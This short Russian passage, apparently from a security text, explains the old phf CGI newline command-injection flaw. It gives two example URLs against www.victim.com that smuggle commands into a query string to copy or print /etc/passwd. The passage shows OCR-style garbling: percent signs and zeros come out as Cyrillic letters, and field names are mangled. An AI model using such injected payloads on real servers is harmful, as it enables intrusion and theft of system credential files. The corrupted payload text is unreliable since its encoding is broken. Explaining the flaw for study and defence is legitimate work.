Проблема в следующем: встретив в командной строке символ перевода строки (ОхОа), он ведет себя иначе:
строка http://www.victim.com/cgi-bin/ phf?шoOacp%20/etc/passwdшo20%7Esomeuser/passwd%OA&Oalias=
&0name^haqr&0email^&0mckname=&0office_phone^ приведет к выполнению на сервере команды ср /etc/passwd
"someuser/passwd, a http:// www.victim.com/cgi-bin/phf?Oalias=шoOA/bin/cat%20/etc/passwd - к выполнению
команды /bin/cat /etc/passwd.